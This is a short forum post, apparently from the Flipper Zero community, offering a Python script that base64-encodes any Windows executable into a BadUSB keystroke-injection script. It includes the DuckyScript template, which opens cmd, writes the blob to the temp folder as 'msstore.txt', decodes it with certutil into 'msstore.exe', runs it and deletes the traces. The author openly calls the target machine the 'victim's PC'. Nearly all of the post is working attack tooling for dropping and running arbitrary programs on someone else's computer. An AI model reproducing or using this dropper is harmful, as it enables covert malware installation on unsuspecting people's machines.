Hello! Today I wrote a simple script to convert exe files into a bad usb script. Its algorithm is quite simple: it takes out the contents of the exe file and collects the exe on the victim’s PC.
import base64 exe_name = input("Enter the name of the executable -> ") data = open(exe_name, "rb").read() encoded = base64.b64encode(data) with open(exe_name + '_bad_usb.txt', 'w') as f: script = open('run_exe.txt', 'r').read() f.write(script.replace("#place here#", encoded.decode("utf-8"))) f.close() print("Done! The file is saved as " + exe_name + "_bad_usb.txt")
Required txt file (run_exe.txt):
GUI r DELAY 1000 STRING cmd.exe ENTER DELAY 2000 STRING cd %temp% ENTER STRING echo #place here# > msstore.txt ENTER STRING certutil -decode msstore.txt msstore.exe ENTER STRING del msstore.txt ENTER STRING msstore.exe ENTER STRING del msstore.exe ENTER STRING exit ENTER
The theme I was inspired by: Running a program from Flipper - #2 by Spildit